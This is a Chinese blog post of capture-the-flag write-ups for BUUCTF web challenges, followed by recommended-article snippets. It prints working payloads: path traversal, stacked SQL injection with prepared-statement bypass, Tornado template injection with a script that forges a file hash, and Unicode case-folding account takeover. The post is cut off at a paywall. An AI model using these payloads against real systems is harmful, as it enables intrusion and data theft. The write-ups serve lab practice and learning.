BUUCTF-WEB刷题记录-1

最新推荐文章于 2023-11-15 14:39:29 发布
最新推荐文章于 2023-11-15 14:39:29 发布
阅读量923 收藏
点赞数
文章标签: php python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105342061
版权
本文记录了作者在不同网络安全比赛中解决的WEB题目,涉及PHP注入、堆叠注入、模板漏洞、Unicode欺骗、字符串解析漏洞等。通过分析源代码和利用技巧,展示了多种攻防思路。
摘要由CSDN通过智能技术生成

目录

[HCTF 2018]WarmUp

index.php?file=source.php
查看源代码
在这里插入图片描述
源码中又进行了一次urldecode
构造payload:?file=source.php%253f../../../../../ffffllllaaaagggg

[强网杯 2019]随便注

利用堆叠注入

-1’;show tables#
-1’;desc words#或者-1’;show columns from words#

预编译查询

预编译相关语法如下:
set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
例句:set @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’);prepare stmt from @sql;EXECUTE stmt;

[护网杯 2018]easy_tornado

tornado的模板漏洞
{ {handler.settings}}得到secret_cookie
然后用以下脚本:注意在python2下运行

import hashlib

def md5(s):

    md5 = hashlib.md5()

    md5.update(s)

    return md5.hexdigest()



filename = '/fllllllllllllag'

cookie_secret = 'bc563633-4591-4b42-b51f-9cf7d3314194'

print(md5(cookie_secret + md5(filename)))

ans = 'file?filename='+filename+'&filehash='+(md5(cookie_secret + md5(filename)))

print ans

[SUCTF 2019]EasySQL

查询操作为select POST[‘query’]||flag from Flag
*,1可以获取
或者把||符号由或改为拼接:1;set sql_mode=PIPES_AS_CONCAT;select 1

[HCTF 2018]admin

这里利用的是Unicode欺骗
在change的地方发现源代码
在这里插入图片描述
在change和register都把输入转化为小写:
在这里插入图片描述
在这里插入图片描述
而转化为小写的地方存在漏洞
在这里插入图片描述
对于一些特殊的Unicode,nodeprep.prepare会进行如下操作

ᴀ -> A -> a
所以我们先注册一个ᴬᴰᴹᴵᴺ,登录之后变成了ADMIN,
在这里插入图片描述
改密码时账号就变成了admin
在这里插入图片描述

https://unicode-table.com/en/blocks/phonetic-extensions/
这个网站可以查
PS:
这题还有一个弱口令漏洞
密码123可以直接登录····

[RoarCTF 2019]Easy Calc

这题利用的是PHP字符串解析漏洞
当php进行解析的时候,如果变量前面有空格,会去掉前面的空格再解析
看一下源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
   
    show_source(__FILE__);
}else{
   
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'
最低0.47元/天 解锁文章
L.o.W
关注
[BUUCTF]刷题记录8
Huamang的博客
08-21 296
[De1CTF 2019]SSRF Me python代码审计 ssrf hash拓展攻击 flask题 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding(
[BUUCTF]刷题记录5
Huamang的博客
04-04 574
[GXYCTF2019]BabyUpload php后缀会被识别,所以只能传图片加htaccess来解析 上传png都失败,jpg是成功的 需要修改Content-Type为image/jpeg 直接传马,识别到有php标志,换script /upload/893e5ad71a4b97784cc21ff87c648a47/jsphp.jpg 由于jpg无法解析,所以传.htaccess 开蚁剑拿到flag ...
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 464
[极客大挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的大致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这题就是爆库,爆表,爆字段,爆内容的基本
[buuctf]刷题记录web
qq_61109509的博客
05-12 913
文章目录pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
Buuctf 刷题记录
m0_62706061的博客
10-12 1774
php反序列化绕过之,过滤\00*\00等
buuctf misc 刷题记录(持续更新)
最新发布
u013107427的博客
11-15 1689
buuctf刷题记录
BUU web 刷题记录
qq_47168481的博客
10-11 1200
sql注入(babysql:双写绕过) 拿到题目 拿万能密码试一下: 发现or被过滤了,但依然会有报错,数据库是mariaDB 试一下字段数: 1’ order by 3# ,知道by也被过滤,通过进一步测试发现or by union select where from 均被过滤。 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version fo
[BUUCTF]刷题记录6
Huamang的博客
04-04 472
[WUSTCTF2020]朴实无华 目录扫描 intval函数的科学记数法绕过 MD5加密后与加密前相等 直接去扫目录,扫到了fl4g.php if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 454
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTF—Web—SQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
buuctfweb刷题wp详解及知识整理----【SUCTF 2019】EasySQL(sql注入)
weixin_45784586的博客
03-22 998
写在前面 这个题不知道查询语句的源代码是真的难写 所查看大佬的博客: https://www.cnblogs.com/chrysanthemum/p/11729891.html https://blog.csdn.net/qq_44657899/article/details/104533077 尝试之路加wp 只有一个文本提交框 发现可以堆叠注入,用show命令 可得到 库名 为ctf,表名F...
BUUCTF web部分writeup
西部壮仔的博客
04-03 1833
持续更新 [MRCTF2020]你传你????呢 很显然这是一道文件上传题,我们直接上传一个webshell.php 好像不行过滤了,我们抓一下包。猜测是验证文件的后缀,我们把文件后缀名php改成jpg emmmm,发现还是不行,修改一下Content-Type,修改成image/jpeg 后缀名再修改为php发现不能上传,猜测应该是验证了Content-type和文件的后缀名,我们爆破一下看看过滤了哪...
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫(有需要的私信)
04-29 973
1、[极客大挑战 2019]EasySQL
BUUCTF笔记之Misc系列部分WriteUp(二)
克格莫(有需要的私信)
06-18 3751
1.爱因斯坦 binwalk分离出一个压缩包。 查看图片备注: 解压得到flag。
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 4338
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
[RoarCTF 2019]Easy Calc 1
xixixihan的博客
12-01 514
做题记录
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5452
BUUCTFWeb题解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值